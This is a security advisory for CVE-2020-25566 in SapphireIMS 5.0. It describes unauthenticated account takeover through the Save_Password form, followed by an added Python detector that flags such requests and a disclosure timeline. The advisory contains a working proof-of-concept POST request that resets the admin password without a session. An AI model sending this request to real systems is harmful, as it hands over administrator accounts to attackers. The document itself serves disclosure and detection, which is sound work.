[CVE-2020-25566] SapphireIMS: Unauthenticated account takeover

Description

In SapphireIMS 5.0, an account can be taken over by sending a crafted request to the Save_Password form, as shown in the POC below. The request does not require a JSESSIONID (i.e. no authenticated session), so any user's password can be reset by setting the username parameter to the target user and the new password fields to base64(desired password).

CVSS 3.0 Base Score

9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Researcher

Tanoy Bose

POC

POST /SapphireIMS/Save_Password HTTP/1.1
Host: 192.168.191.48
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 434
Origin: http://192.168.191.48
Connection: close
Referer: http://192.168.191.48/SapphireIMS/ChangePassword.jsp
Upgrade-Insecure-Requests: 1

username=admin&username=admin&fullName=Administrator&email=sapphireimsuser%40localhost.com&isMandatory_EmailAddress=0&cellno=&isMandatory_CellNo=0&teleno=&isMandatory_TelephoneNo=0&userpreferenceid=1&passwordDisabled=0&oldpassword=YWRtaW4%3D&newpassword=YWRtaW4x&resetDisabled=0&renewpassword=YWRtaW4x&pin=&securityPinMin=3&securityPinMax=4&question=&answer=&timezone=America%2FLos_Angeles&securityPinEnabled=1&timeZoneChangeEnabled=1
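As an added defensive example (not part of this advisory), the following Python inspects captured HTTP requests for the pattern described above: a POST to Save_Password that carries no JSESSIONID cookie, or one that sends the username parameter more than once as the POC does. The host name, request samples and password values are constructed placeholders.

```python
import re
from urllib.parse import parse_qs

# Path of the password form named in the advisory.
SAVE_PASSWORD_PATH = "/SapphireIMS/Save_Password"

def parse_http_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, path, headers and form fields."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # keep_blank_values so empty fields such as "pin=" still show up
    return {"method": method, "path": path, "headers": headers,
            "form": parse_qs(body, keep_blank_values=True)}

def has_session_cookie(headers: dict) -> bool:
    """True if the Cookie header carries a JSESSIONID (an application session)."""
    return re.search(r"(?:^|;\s*)JSESSIONID=", headers.get("cookie", "")) is not None

def inspect_password_change(raw: str) -> list:
    """Findings for one captured request; an empty list means nothing suspicious."""
    req = parse_http_request(raw)
    if req["method"] != "POST" or req["path"] != SAVE_PASSWORD_PATH:
        return []
    findings = []
    if not has_session_cookie(req["headers"]):
        findings.append("no JSESSIONID: password change attempted without a session")
    usernames = req["form"].get("username", [])
    if len(usernames) > 1:
        findings.append("username sent %d times (parameter pollution)" % len(usernames))
    elif not usernames:
        findings.append("username parameter missing")
    return findings

# Constructed samples (not captured traffic): one shaped like the advisory's POC,
# one from a normal logged-in session. Password values are base64("REDACTED").
SUSPECT = ("POST /SapphireIMS/Save_Password HTTP/1.1\r\nHost: ims.example.internal\r\n"
           "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
           "username=admin&username=admin&oldpassword=UkVEQUNURUQ%3D&newpassword=UkVEQUNURUQ%3D")
BENIGN = ("POST /SapphireIMS/Save_Password HTTP/1.1\r\nHost: ims.example.internal\r\n"
          "Cookie: theme=dark; JSESSIONID=1A2B3C4D\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n"
          "username=jdoe&oldpassword=UkVEQUNURUQ%3D&newpassword=UkVEQUNURUQ%3D")

if __name__ == "__main__":
    for label, sample in (("suspect", SUSPECT), ("benign", BENIGN)):
        print(label, inspect_password_change(sample) or "ok")
```

The same two checks (session present, username bound to that session rather than taken from the form) are what the server-side handler must enforce for the fix to hold.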


Disclosure timelines

  • 07 May, 2020 - Vendor informed; failed
  • 16 Sept, 2020 - CERT/CC and CERT-In informed